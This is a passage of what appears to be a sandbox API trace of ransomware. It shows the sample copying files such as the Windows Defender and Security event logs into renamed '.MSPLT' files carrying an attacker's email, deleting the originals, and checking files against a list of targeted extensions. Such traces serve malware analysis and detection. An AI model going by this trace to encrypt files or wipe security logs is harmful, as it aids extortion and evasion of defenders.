(lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0295.107] GetLastError () returned 0x0 [0295.107] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.161] WriteFile (in: hFile=0x454, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.163] ReadFile (in: hFile=0x47c, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.164] WriteFile (in: hFile=0x454, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x13c, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x13c, lpOverlapped=0x0) returned 1 [0295.164] SetEndOfFile (hFile=0x454) returned 1 [0295.164] CloseHandle (hObject=0x454) returned 1 [0295.176] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.176] SetEndOfFile (hFile=0x47c) returned 1 [0295.178] CloseHandle (hObject=0x47c) returned 1 [0295.179] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.179] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 1 [0295.336] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.336] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.336] lstrlenW (lpString=".doc") returned 4 [0295.336] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.336] lstrlenW (lpString=".docx") returned 5 [0295.336] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.336] lstrlenW (lpString=".pdf") returned 4 [0295.336] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.336] lstrlenW (lpString=".xls") returned 4 [0295.337] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.337] lstrlenW (lpString=".xlsx") returned 5 [0295.337] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.337] lstrlenW (lpString=".ppt") returned 4 [0295.337] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.337] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.337] lstrlenW (lpString=".zip") returned 4 [0295.337] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.337] lstrlenW (lpString=".rar") returned 4 [0295.337] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.337] lstrlenW (lpString=".bz2") returned 4 [0295.337] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.358] lstrlenW (lpString=".7z") returned 3 [0295.358] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.358] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.359] lstrlenW (lpString=".dbf") returned 4 [0295.359] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.359] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.368] lstrlenW (lpString=".1cd") returned 4 [0295.368] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.368] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.368] lstrlenW (lpString=".jpg") returned 4 [0295.368] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.368] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.368] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.368] lstrlenW (lpString=".doc") returned 4 [0295.368] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.368] lstrlenW (lpString=".docx") returned 5 [0295.368] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.368] lstrlenW (lpString=".pdf") returned 4 [0295.368] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.368] lstrlenW (lpString=".xls") returned 4 [0295.368] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.368] lstrlenW (lpString=".xlsx") returned 5 [0295.368] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.368] lstrlenW (lpString=".ppt") returned 4 [0295.368] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.368] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.369] lstrlenW (lpString=".zip") returned 4 [0295.369] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.369] lstrlenW (lpString=".rar") returned 4 [0295.369] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.369] lstrlenW (lpString=".bz2") returned 4 [0295.369] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.369] lstrlenW (lpString=".7z") returned 3 [0295.369] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.369] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.369] lstrlenW (lpString=".dbf") returned 4 [0295.369] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.369] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.369] lstrlenW (lpString=".1cd") returned 4 [0295.369] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.369] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 60 [0295.369] lstrlenW (lpString=".jpg") returned 4 [0295.369] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.369] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.369] lstrlenW (lpString="Security.evtx") returned 13 [0295.369] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0295.370] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=1118208) returned 1 [0295.370] CloseHandle (hObject=0x488) returned 1 [0295.370] GetFileAttributesW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 0x20 [0295.370] GetFileAttributesW (lpFileName="C:\\Logs\\Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\security.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.370] CreateFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0295.371] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.371] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.371] CreateFileW (lpFileName="C:\\Logs\\Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\security.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0295.372] GetLastError () returned 0x0 [0295.372] ReadFile (in: hFile=0x488, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0295.405] WriteFile (in: hFile=0x46c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0295.767] ReadFile (in: hFile=0x488, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x11010, lpOverlapped=0x0) returned 1 [0295.781] WriteFile (in: hFile=0x46c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x11020, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x11020, lpOverlapped=0x0) returned 1 [0295.787] ReadFile (in: hFile=0x488, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.787] WriteFile (in: hFile=0x46c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xee, lpOverlapped=0x0) returned 1 [0295.787] SetEndOfFile (hFile=0x46c) returned 1 [0295.787] CloseHandle (hObject=0x46c) returned 1 [0296.196] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.196] SetEndOfFile (hFile=0x488) returned 1 [0296.587] CloseHandle (hObject=0x488) returned 1 [0296.587] SetFileAttributesW (lpFileName="C:\\Logs\\Security.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0296.588] DeleteFileW (lpFileName="C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx")) returned 1 [0296.588] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.588] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.588] lstrlenW (lpString=".doc") returned 4 [0296.588] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.588] lstrlenW (lpString=".docx") returned 5 [0296.588] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.588] lstrlenW (lpString=".pdf") returned 4 [0296.588] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.588] lstrlenW (lpString=".xls") returned 4 [0296.588] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.588] lstrlenW (lpString=".xlsx") returned 5 [0296.588] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.588] lstrlenW (lpString=".ppt") returned 4 [0296.589] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.589] lstrlenW (lpString=".zip") returned 4 [0296.589] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString=".rar") returned 4 [0296.589] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString=".bz2") returned 4 [0296.589] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString=".7z") returned 3 [0296.589] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.589] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.589] lstrlenW (lpString=".dbf") returned 4 [0296.589] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.589] lstrlenW (lpString=".1cd") returned 4 [0296.589] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.589] lstrlenW (lpString=".jpg") returned 4 [0296.589] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.589] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.589] lstrlenW (lpString=".doc") returned 4 [0296.589] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.589] lstrlenW (lpString=".docx") returned 5 [0296.590] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.590] lstrlenW (lpString=".pdf") returned 4 [0296.590] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString=".xls") returned 4 [0296.590] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString=".xlsx") returned 5 [0296.590] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.590] lstrlenW (lpString=".ppt") returned 4 [0296.590] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.590] lstrlenW (lpString=".zip") returned 4 [0296.590] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString=".rar") returned 4 [0296.590] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString=".bz2") returned 4 [0296.590] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString=".7z") returned 3 [0296.590] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.590] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.590] lstrlenW (lpString=".dbf") returned 4 [0296.590] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.590] lstrlenW (lpString=".1cd") returned 4 [0296.590] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.590] lstrlenW (lpString="C:\\Logs\\Security.evtx") returned 21 [0296.590] lstrlenW (lpString=".jpg") returned 4 [0296.590] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.591] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.591] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0296.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0296.591] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=19136) returned 1 [0296.591] CloseHandle (hObject=0x488) returned 1 [0296.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x20 [0296.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.592] lstrlenW (lpString=".doc") returned 4 [0296.592] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.592] lstrlenW (lpString=".docx") returned 5 [0296.592] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.592] lstrlenW (lpString=".pdf") returned 4 [0296.592] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.592] lstrlenW (lpString=".xls") returned 4 [0296.592] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.592] lstrlenW (lpString=".xlsx") returned 5 [0296.593] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.593] lstrlenW (lpString=".ppt") returned 4 [0296.593] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.593] lstrlenW (lpString=".zip") returned 4 [0296.593] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.593] lstrlenW (lpString=".rar") returned 4 [0296.593] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.593] lstrlenW (lpString=".bz2") returned 4 [0296.593] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.593] lstrlenW (lpString=".7z") returned 3 [0296.593] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.593] lstrlenW (lpString=".dbf") returned 4 [0296.593] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.593] lstrlenW (lpString=".1cd") returned 4 [0296.593] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.593] lstrlenW (lpString=".jpg") returned 4 [0296.593] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.593] lstrlenW (lpString=".doc") returned 4 [0296.593] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.594] lstrlenW (lpString=".docx") returned 5 [0296.594] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.594] lstrlenW (lpString=".pdf") returned 4 [0296.594] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.594] lstrlenW (lpString=".xls") returned 4 [0296.594] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.594] lstrlenW (lpString=".xlsx") returned 5 [0296.594] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.594] lstrlenW (lpString=".ppt") returned 4 [0296.594] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.594] lstrlenW (lpString=".zip") returned 4 [0296.594] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.594] lstrlenW (lpString=".rar") returned 4 [0296.594] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.594] lstrlenW (lpString=".bz2") returned 4 [0296.594] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.594] lstrlenW (lpString=".7z") returned 3 [0296.594] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.594] lstrlenW (lpString=".dbf") returned 4 [0296.594] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.594] lstrlenW (lpString=".1cd") returned 4 [0296.594] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 90 [0296.594] lstrlenW (lpString=".jpg") returned 4 [0296.595] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.595] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.595] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0296.595] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0296.596] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=18624) returned 1 [0296.596] CloseHandle (hObject=0x488) returned 1 [0296.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x20 [0296.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.597] lstrlenW (lpString=".doc") returned 4 [0296.597] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.597] lstrlenW (lpString=".docx") returned 5 [0296.597] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.597] lstrlenW (lpString=".pdf") returned 4 [0296.597] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.597] lstrlenW (lpString=".xls") returned 4 [0296.597] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.597] lstrlenW (lpString=".xlsx") returned 5 [0296.597] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.598] lstrlenW (lpString=".ppt") returned 4 [0296.598] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.598] lstrlenW (lpString=".zip") returned 4 [0296.598] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.598] lstrlenW (lpString=".rar") returned 4 [0296.598] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.598] lstrlenW (lpString=".bz2") returned 4 [0296.598] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.598] lstrlenW (lpString=".7z") returned 3 [0296.598] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.598] lstrlenW (lpString=".dbf") returned 4 [0296.598] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.598] lstrlenW (lpString=".1cd") returned 4 [0296.598] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.598] lstrlenW (lpString=".jpg") returned 4 [0296.598] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.598] lstrlenW (lpString=".doc") returned 4 [0296.598] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.599] lstrlenW (lpString=".docx") returned 5 [0296.599] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.599] lstrlenW (lpString=".pdf") returned 4 [0296.599] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.599] lstrlenW (lpString=".xls") returned 4 [0296.599] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.599] lstrlenW (lpString=".xlsx") returned 5 [0296.599] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.599] lstrlenW (lpString=".ppt") returned 4 [0296.599] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.599] lstrlenW (lpString=".zip") returned 4 [0296.599] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.599] lstrlenW (lpString=".rar") returned 4 [0296.599] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.599] lstrlenW (lpString=".bz2") returned 4 [0296.599] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.599] lstrlenW (lpString=".7z") returned 3 [0296.599] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.599] lstrlenW (lpString=".dbf") returned 4 [0296.599] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 